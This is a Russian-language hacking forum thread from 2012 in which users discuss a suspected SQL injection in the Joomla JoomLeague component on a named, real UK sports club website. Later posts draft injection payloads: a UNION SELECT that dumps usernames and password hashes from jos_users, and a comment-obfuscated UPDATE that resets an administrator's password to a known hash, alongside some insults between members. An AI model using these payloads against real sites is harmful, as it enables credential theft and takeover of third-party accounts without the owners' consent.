 |
|
24.04.2012, 10:45
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
No checkbone?
Код:
http://www.wollatonpirates.co.uk/index.php?option=com_joomleague&func=showNextMatch&p=1
|
|
|
24.04.2012, 10:56
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
Сообщение от faza02
как это так «дела не меняет?».
в том смысле, что это нельзя эксплуатировать, и быть может это вообще не уязвимость
|
|
|
|
24.04.2012, 11:34
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Mihailov Alx
Mihailov Alx said:
в том смысле, что это нельзя эксплуатировать, и быть может это вообще не уязвимость
наркоман шоле? Serafim белым по русски написал вроде:
/showpost.php?p=3117961&postcount=20488
|
|
|
|
24.04.2012, 11:49
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
Сообщение от d1v
наркоман шоле?
Serafim
белым по русски написал вроде:
/showpost.php?p=3117961&postcount=20488
Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.
|
|
|
|
24.04.2012, 11:53
|
|
Banned
Регистрация: 27.05.2009
Сообщений: 17
С нами:
8924963
Репутация:
75
|
|
Сообщение от Mihailov Alx
Mihailov Alx said:
Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.
Согласен
|
|
|
|
24.04.2012, 11:56
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Mihailov Alx
Mihailov Alx said:
Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.
какие оскорбления? ты на прошлой странице написал, что нет ни единого намёка в исходном коде, если ты туда смотрел - ты не мог не заметить вывода. и кто тебе сказал, что тебе обязаны разжёвывать и класть в рот? твоя невнимательность - это только твоя проблема.
|
|
|
|
24.04.2012, 12:08
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
Сейчас я понял откуда пошло недопонимание - я использую Google Chrome и поведение кодировок в ссылках там несколько иное, нежели в FF. Соответственно и результат иной. Если бы я раньше это узрел, то не просил пояснений.
|
|
|
|
24.04.2012, 12:10
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Mihailov Alx
Mihailov Alx said:
Сейчас я понял откуда пошло недопонимание - я использую Google Chrome и поведение кодировок в ссылках там несколько иное, нежели в FF. Соответственно и результат иной. Если бы я раньше это узрел, то не просил пояснений.
во всех браузерах всё выводится совершенно одинаково.
|
|
|
|
24.04.2012, 13:47
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
Я сейчас через Canary сижу, ну ладно, суть не в этом.
как я понимаю запрос выглядит так ( синтаксис скорее всего в корне неправильный)
UNION SELECT group_concat(`username`,`password`),2,3,4
FROM `jos_users`
если выполнять
SET password='21232f297a57a5a743894a0e4a801fc3'
WHERE id = 62;
то это должно выглядеть так:
/**/update/**/jos_users/**/SET/**/password='21232f297a57a5a743894a0e4a801fc3'/WHERE/**/id=62
Поправьте
|
|
|
|
24.04.2012, 13:55
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Mihailov Alx
Mihailov Alx said:
Я сейчас через Canary сижу, ну ладно, суть не в этом.
как я понимаю запрос выглядит так ( синтаксис скорее всего в корне неправильный)
UNION SELECT group_concat(`username`,`password`),2,3,4
FROM `jos_users`
если выполнять
SET password='21232f297a57a5a743894a0e4a801fc3'
WHERE id = 62;
то это должно выглядеть так:
/**/update/**/jos_users/**/SET/**/password='21232f297a57a5a743894a0e4a801fc3'/WHERE/**/id=62
Поправьте
http://forum.antichat.net/thread104591.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [ Dumi ]](/avatars/avatar86467.jpg?3118500){kind=avatar}
Похожие темы
Линейный вид
